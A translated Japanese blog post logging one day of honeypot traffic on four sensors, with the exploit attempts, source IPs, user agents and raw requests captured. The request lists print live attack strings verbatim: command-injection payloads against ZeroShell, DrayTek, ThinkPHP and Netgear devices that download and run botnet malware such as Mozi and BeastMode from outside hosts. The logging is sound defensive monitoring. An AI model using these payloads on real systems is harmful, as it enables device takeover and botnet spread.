コンニチハレバレトシタアオゾラ

With nothing better to do, I spend the whole day facing my blog, jotting down at random whatever trifling thoughts pass through my mind,

2020/07/22 Honeypot (tentative) observation record

This is the honeypot (tentative) observation record for 2020/07/22.

Highlights
Location:JP

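The following were observed:

Access targeting a vulnerability in DrayTek products
Access targeting a vulnerability in GPON routers
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting a vulnerability in ThinkPHP
Access targeting the ZeroShell Linux Router vulnerability (CVE-2019-12725)
Scanning by XTC
Scanning by zgrab
Scanning for Apache Solr
Scanning for Apache Tomcat
Scanning for phpMyAdmin
Malicious traffic related to 5[.]188[.]210[.]227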

Location:US

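The following were observed:

Access targeting a vulnerability in Asustor NAS
Access targeting a vulnerability in ASUS modems
Access targeting a vulnerability in AVTECH IP Camera/NVR/DVR Devices
Access targeting a vulnerability in Dell KACE Systems Management Appliance
Access targeting a vulnerability in DLink products
Access targeting a vulnerability in EnGenius EnShare IoT Gigabit Cloud Service
Access targeting a vulnerability in Enigma NMS
Access targeting a vulnerability in Geutebruck IP Camera
Access targeting a vulnerability in GoAhead IP Camera
Access targeting a vulnerability in GPON routers
Access targeting a vulnerability in Huawei routers
Access targeting a vulnerability in HooToo TripMate routers
Access targeting a vulnerability in LG Supersign
Access targeting a vulnerability in Linear eMerge E3 products
Access targeting a vulnerability in Linksys E-series devices
Access targeting a vulnerability in MiCasa VeraLite Smart home controller
Access targeting a vulnerability in NetGain Enterprise Manager
Access targeting a vulnerability in Netgear ReadyNas
Access targeting a vulnerability in NUUO NVRmini
Access targeting a vulnerability in OpenDreamBox
Access targeting the Oracle WebLogic vulnerability (CVE-2017-3506)
Access targeting the Oracle WebLogic vulnerability (CVE-2019-2725)
Access targeting the Schneider Electric U.motion LifeSpace Management System vulnerability (CVE-2018-7841)
Access targeting a vulnerability in Shenzhen TVT products
Access targeting a vulnerability in ThinkPHP
Access targeting a vulnerability in Vacron NVR Devices
Access targeting the VMware NSX SD-WAN Edge vulnerability (CVE-2018-6961)
Access targeting a vulnerability in WePresent Wireless Presentation System
Access targeting the Wireless Presentation System vulnerability (CVE-2019-3929)
Access targeting a vulnerability in ZTE routers
Access targeting the ZyXEL NAS product vulnerability (CVE-2020-9054)
Scanning by Googlebot
Scanning by GoScraper
Access with the User-Agent "Hello, World"
Access with the User-Agent "Hello, world"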

The following access to /shell was observed.

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
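/tmp/Mozi.a jaws

Location:UK

The following were observed:

Access targeting a vulnerability in DrayTek products
Access targeting a vulnerability in NetGear products
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting a vulnerability in ThinkPHP
Access targeting the ZeroShell Linux Router vulnerability (CVE-2019-12725)
Scanning by polaris botnet
Scanning by zgrab
Scanning for Apache Solr
Scanning for Apache Tomcat
Access with the User-Agent "Hello, world"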

The following access to /shell was observed.

cd /tmp;
rm -rf *;
wget 95.213.165.45/beastmode/b3astmode;
chmod 777 /tmp/b3astmode;
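sh /tmp/b3astmode BeastMode.Rep.Jaws

Location:SG

The following were observed:

Access targeting a vulnerability in GPON routers
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting a vulnerability in ThinkPHP
Access targeting the ZeroShell Linux Router vulnerability (CVE-2019-12725)
Scanning by zgrab
Scanning for Apache Solr
Scanning for Apache Tomcat
Malicious traffic related to 5[.]188[.]210[.]227
Access with the User-Agent "Hello, world"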

The following access to /shell was observed.

cd /tmp;
rm -rf *;
wget 165.22.101.145/beastmode/b3astmode;
chmod 777 /tmp/b3astmode;
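sh /tmp/b3astmode BeastMode.Rep.Jaws

Access count trend

JP: total accesses: 60 (change from previous day: -37)
US: total accesses: 242 (change from previous day: +102)
UK: total accesses: 23 (change from previous day: -12)
SG: total accesses: 28 (change from previous day: +13)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.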

Location:JP

Source IP addresses

Count Source IP address Country
3 5.182.210.205 Netherlands
1 5.188.210.227 Russia
6 52.176.48.56 United States
3 59.127.105.216 Taiwan
1 93.174.93.139 Netherlands
3 94.230.208.147 Switzerland
1 114.113.112.92 China
1 162.243.128.13 United States
27 180.240.191.222 Singapore
7 195.54.160.21 Russia
5 195.154.171.182 France
1 196.202.71.90 Egypt
1 200.119.45.66 Colombia

User-Agent list

Count User-Agent
40 -
3 Go-http-client/1.1
5 Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1 Mozilla/5.0 zgrab/0.x
1 XTC

Request list

Count Method Request Protocol
3 -
3 \x16\x03\x01
2 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET //MyAdmin/scripts/setup.php HTTP/1.1
1 GET //myadmin/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET //phpmyadmin/scripts/setup.php HTTP/1.1
1 GET //pma/scripts/setup.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
27 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /muieblackcat HTTP/1.1
1 GET /portal/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /v2/_catalog HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET HTTP/1.1 HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:US

Source IP addresses

Count Source IP address Country
3 5.182.210.205 Netherlands
1 37.49.224.33 Estonia
1 49.89.3.63 China
1 61.219.11.153 Taiwan
1 80.82.70.118 Netherlands
197 89.144.47.5 Germany
1 93.174.93.139 Netherlands
1 104.131.8.207 United States
1 104.131.13.221 United States
20 107.167.7.226 United States
10 129.28.172.238 China
4 139.205.177.97 China
1 222.240.117.51 China

User-Agent list

Count User-Agent
6 -
1 Go-http-client/1.1
24 GoScraper
173 Googlebot/2.1 (+http://www.google.com/bot.html)
1 Hello, World
1 Hello, world
4 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15
20 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0

Request list

Count Method Request Protocol
1 -
3 \x16\x03\x01
1 \x16\x03\x02\x01o\x01
1 GET /.env HTTP/1.1
1 GET /.local HTTP/1.1
1 GET /.production HTTP/1.1
1 GET /.remote HTTP/1.1
1 GET //app/.env HTTP/1.1
1 GET //apps/.env HTTP/1.1
1 GET //assets/.env HTTP/1.1
1 GET //config/.env HTTP/1.1
1 GET //core/.env HTTP/1.1
1 GET //core/Datavase/.env HTTP/1.1
1 GET //core/app/.env HTTP/1.1
1 GET //cron/.env HTTP/1.1
1 GET //cronlab/.env HTTP/1.1
1 GET //database/.env HTTP/1.1
1 GET //lab/.env HTTP/1.1
1 GET //lib/.env HTTP/1.1
1 GET //saas/.env HTTP/1.1
1 GET //sitemaps/.env HTTP/1.1
1 GET //uploads/.env HTTP/1.1
1 GET //vendor/.env HTTP/1.1
1 GET /Diagnostics.asp HTTP/1.1
1 GET /GponForm/diag_Form?images/ HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /Main_Analysis_Content.asp HTTP/1.1
2 GET /NonExistence HTTP/1.1
1 GET /OvCgi/connectedNodes.ovpl HTTP/1.1
1 GET /SGPAdmin/fileRequest HTTP/1.1
1 GET /SetSmarcardSettings.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /UD/act HTTP/1.1
1 GET /VhttpdMgr HTTP/1.1
1 GET /_async/AsyncResponseServiceHttps HTTP/1.1
1 GET /_search HTTP/1.1
1 GET /action.php HTTP/1.1
1 GET /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
1 GET /adm.php HTTP/1.1
1 GET /admin.cgi HTTP/1.1
1 GET /adminer.php HTTP/1.1
1 GET /adv,/cgi-bin/weblogin.cgi HTTP/1.1
1 GET /api/backup/logout.cgi HTTP/1.1
2 GET /api/project/repo/log/graph/ HTTP/1.1
1 GET /app/lan/BeforeLoginCn.js HTTP/1.1
1 GET /apply.cgi HTTP/1.1
1 GET /apps/a3/cfg_ethping.cgi HTTP/1.1
1 GET /awcuser/cgi-bin/vcs HTTP/1.1
1 GET /awstatstotals/awstatstotals.php HTTP/1.1
1 GET /ayefeaturesconvert.js HTTP/1.1
1 GET /boaform/admin/formPing HTTP/1.1
1 GET /board.cgi HTTP/1.1
1 GET /boardData102.php HTTP/1.1
1 GET /boardData103.php HTTP/1.1
1 GET /boardDataJP.php HTTP/1.1
1 GET /boardDataNA.php HTTP/1.1
2 GET /boardDataWW.php HTTP/1.1
1 GET /card_scan_decoder.php HTTP/1.0
1 GET /card_scan_decoder.php HTTP/1.1
1 GET /ccbill/whereami.cgi HTTP/1.1
1 GET /cgi HTTP/1.1
1 GET /cgi-bin/ViewLog.asp HTTP/1.1
1 GET /cgi-bin/admin/servetest HTTP/1.1
1 GET /cgi-bin/adv_remotelog.asp HTTP/1.1
1 GET /cgi-bin/apply.cgi HTTP/1.1
1 GET /cgi-bin/awstats.pl HTTP/1.1
1 GET /cgi-bin/bconf.cgi HTTP/1.1
1 GET /cgi-bin/board.cgi HTTP/1.1
1 GET /cgi-bin/ccbill/whereami.cgi HTTP/1.1
1 GET /cgi-bin/cgiServer.exx HTTP/1.1
1 GET /cgi-bin/cgi_system HTTP/1.1
2 GET /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1
1 GET /cgi-bin/ddns_start.cgi HTTP/1.1
1 GET /cgi-bin/diagnostic.cgi HTTP/1.1
1 GET /cgi-bin/file_transfer.cgi HTTP/1.1
2 GET /cgi-bin/getddnsattr.cgi HTTP/1.1
1 GET /cgi-bin/getinetattr.cgi HTTP/1.1
1 GET /cgi-bin/getnettype.cgi HTTP/1.1
1 GET /cgi-bin/getupnp.cgi HTTP/1.1
1 GET /cgi-bin/getwifiattr.cgi HTTP/1.1
1 GET /cgi-bin/getwifistatus.cgi HTTP/1.1
1 GET /cgi-bin/img.pl HTTP/1.1
1 GET /cgi-bin/inetconfig.cgi HTTP/1.1
1 GET /cgi-bin/iptest.cgi HTTP/1.1
1 GET /cgi-bin/kerbynet HTTP/1.1
1 GET /cgi-bin/listwifiap.cgi HTTP/1.1
2 GET /cgi-bin/luci/;stok=a1ec162fe4b3a17cdff58dcc960539ed/api/xqsmarthome/request_mitv HTTP/1.1
2 GET /cgi-bin/luci/;stok=a1ec162fe4b3a17cdff58dcc960539ed/expert/maintenance/diagnostic/nslookup HTTP/1.1
1 GET /cgi-bin/luci/;stok=a714f92968ab8cc6466f87c8618cfc30/api/misns/wifi_access HTTP/1.1
1 GET /cgi-bin/luci/expert/maintenance/diagnostic/nslookup HTTP/1.1
1 GET /cgi-bin/mainfunction.cgi HTTP/1.1
1 GET /cgi-bin/masterCGI HTTP/1.1
1 GET /cgi-bin/nobody/Search.cgi HTTP/1.1
2 GET /cgi-bin/operator/servetest HTTP/1.1
1 GET /cgi-bin/p2p.cgi HTTP/1.1
2 GET /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1
1 GET /cgi-bin/paraconf.cgi HTTP/1.1
1 GET /cgi-bin/preview_email.cgi HTTP/1.1
1 GET /cgi-bin/protected/discover_and_manage.cgi HTTP/1.1
1 GET /cgi-bin/rdfs.cgi HTTP/1.1
2 GET /cgi-bin/scanwifi.cgi HTTP/1.1
1 GET /cgi-bin/script HTTP/1.1
1 GET /cgi-bin/setadslattr.cgi HTTP/1.1
1 GET /cgi-bin/setddnsattr.cgi HTTP/1.1
2 GET /cgi-bin/setinetattr.cgi HTTP/1.1
1 GET /cgi-bin/setwifiattr.cgi HTTP/1.1
1 GET /cgi-bin/spboard/board.cgi HTTP/1.1
1 GET /cgi-bin/statuswml.cgi HTTP/1.1
1 GET /cgi-bin/system.cgi HTTP/1.1
2 GET /cgi-bin/test HTTP/1.1
1 GET /cgi-bin/tools_time.asp HTTP/1.1
1 GET /cgi-bin/upnp_start.cgi HTTP/1.1
1 GET /cgi-bin/webcm HTTP/1.1
1 GET /cgi-bin/webctrl.cgi HTTP/1.1
1 GET /cgi-bin/whereami.cgi HTTP/1.1
1 GET /cgi-bin/wifimode.cgi HTTP/1.1
1 GET /cgi-bin/wifitest.cgi HTTP/1.1
1 GET /command.php HTTP/1.1
1 GET /csspwn.php HTTP/1.1
1 GET /ctrlt/DeviceUpgrade_1 HTTP/1.1
2 GET /debug.cgi HTTP/1.1
1 GET /diagnostic.php HTTP/1.1
1 GET /dnslookup.cgi HTTP/1.1
1 GET /dogfood/mail/spell.php HTTP/1.1
1 GET /editBlackAndWhiteList HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /getpage.gch HTTP/1.1
1 GET /global_data/ HTTP/1.1
1 GET /globe HTTP/1.1
2 GET /goform/formSysCmd HTTP/1.1
2 GET /goform/mp HTTP/1.1
1 GET /goip/cron.htm HTTP/1.1
1 GET /handle_iscsi.php HTTP/1.1
1 GET /hndBlock.cgi HTTP/1.1
1 GET /hndUnblock.cgi HTTP/1.1
1 GET /horde/imp/test.php HTTP/1.1
1 GET /html/SetSmarcardSettings.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /imp/test.php HTTP/1.1
1 GET /incl/image_test.shtml HTTP/1.1
1 GET /index.html?findcli=-1 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=php%20-r%20'phpinfo();' HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /js/Multi_Language.js HTTP/1.1
1 GET /language/Swedish HTTP/1.1
1 GET /linuxki/experimental/vis/kivis.php HTTP/1.1
2 GET /login.action HTTP/1.1
1 GET /login.cgi HTTP/1.1
1 GET /login.gch HTTP/1.1
1 GET /login.php HTTP/1.1
1 GET /login_handler.php HTTP/1.1
2 GET /maintenance/controllerFlirSystem.php HTTP/1.1
1 GET /maker/snwrite.cgi HTTP/1.1
1 GET /mnt_ping.cgi HTTP/1.1
1 GET /moadmin/moadmin.php HTTP/1.1
1 GET /monitor/op5/nacoma/command_test.php HTTP/1.1
2 GET /nagios/cgi-bin/statuswml.cgi HTTP/1.1
1 GET /ona/ HTTP/1.1
1 GET /op5config/welcome HTTP/1.1
1 GET /p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2 HTTP/1.1
1 GET /page/maintenance/lanSettings/dns HTTP/1.1
1 GET /pages/systemcall.php HTTP/1.1
1 GET /parse_xml.cgi HTTP/1.1
1 GET /phpMoAdmin/moadmin.php HTTP/1.1
1 GET /phpmoadmin/moadmin.php HTTP/1.1
1 GET /picsdesc.xml HTTP/1.1
1 GET /ping.cgi HTTP/1.1
1 GET /portal/apis/aggrecate_js.cgi HTTP/1.1
1 GET /protocol.csp HTTP/1.1
2 GET /public/index.php HTTP/1.1
1 GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=php%20-r%20'phpinfo();' HTTP/1.1
1 GET /qsr_server/device/getThumbnail HTTP/1.1
1 GET /qsrserver/device/getThumbnail HTTP/1.1
1 GET /recordings/misc/callme_page.php HTTP/1.1
1 GET /repository/annotate HTTP/1.1
1 GET /sarFILE/style.css HTTP/1.1
1 GET /scripts/ajaxPortal.lua HTTP/1.1
1 GET /scripts/rpc.php HTTP/1.1
1 GET /sdwan/nitro/v1/config/get_package_file HTTP/1.1
1 GET /service/krashrpt.php HTTP/1.1
1 GET /setSystemCommand HTTP/1.1
2 GET /set_ftp.cgi HTTP/1.1
1 GET /setup.cgi HTTP/1.1
1 GET /setup.xml HTTP/1.1
1 GET /shell HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /shell?echo+ukrmoney HTTP/1.1
2 GET /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
1 GET /smb_scheduler/cdr.htm HTTP/1.1
1 GET /soap.cgi HTTP/1.1
1 GET /softnas/snserver/snserv.php HTTP/1.1
1 GET /stainfo.cgi HTTP/1.1
1 GET /system.ini?loginuse&loginpas HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /tmBlock.cgi HTTP/1.1
1 GET /tmUnblock.cgi HTTP/1.1
1 GET /u/jsp/tools/exec.jsp HTTP/1.1
1 GET /uapi-cgi/admin/testaction.cgi HTTP/1.1
1 GET /uapi-cgi/viewer/admin/testaction.cgi HTTP/1.1
2 GET /uapi-cgi/viewer/simple_loglistjs.cgi HTTP/1.1
1 GET /uapi-cgi/viewer/testaction.cgi HTTP/1.1
2 GET /upgrade_handle.php HTTP/1.1
2 GET /upnp/control/hag HTTP/1.1
1 GET /user/register HTTP/1.1
1 GET /utility.cgi HTTP/1.1
1 GET /web/cgi-bin/usbinteract.cgi HTTP/1.1
1 GET /webadmin/script HTTP/1.1
1 GET /wls-wsat/CoordinatorPortType HTTP/1.1
1 GET /wp-content/plugins/dzs-videogallery/img.php HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1

Location:UK

Source IP addresses

Count Source IP address Country
1 60.246.11.234 Macao
4 80.82.77.33 Netherlands
1 89.248.168.39 Netherlands
1 93.174.93.139 Netherlands
1 96.69.158.193 United States
1 98.235.253.175 United States
2 143.92.32.86 Singapore
1 162.243.128.147 United States
1 190.94.192.8 Venezuela
1 192.241.233.249 United States
7 195.54.160.21 Russia
1 200.217.4.9 Brazil
1 223.149.252.240 China

User-Agent list

Count User-Agent
9 -
1 Hello, world
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 zgrab/0.x
1 polaris botnet
1 python-requests/2.23.0
1 python-requests/2.24.0

Request list

Count Method Request Protocol
1 CONNECT g[.]alicdn[.]com/:443 HTTP/1.1
1 CONNECT httpbin[.]org/:443 HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
1 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+95.213.165.45/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /boaform/admin/formPing HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:SG

Source IP addresses

Count Source IP address Country
3 5.182.210.205 Netherlands
1 5.188.210.227 Russia
1 31.182.159.17 Poland
1 93.174.93.139 Netherlands
1 102.43.18.31 Egypt
1 159.18.94.65 Canada
1 161.97.81.64 Germany
1 162.243.128.57 United States
1 192.241.238.37 United States
14 195.54.160.21 Russia
3 195.154.171.182 France

User-Agent list

Count User-Agent
6 -
1 Hello, world
3 Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
14 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 zgrab/0.x

Request list

Count Method Request Protocol
3 \x16\x03\x01
1 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
1 GET /hudson HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+165.22.101.145/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 HEAD / HTTP/1.0
1 OPTIONS * HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1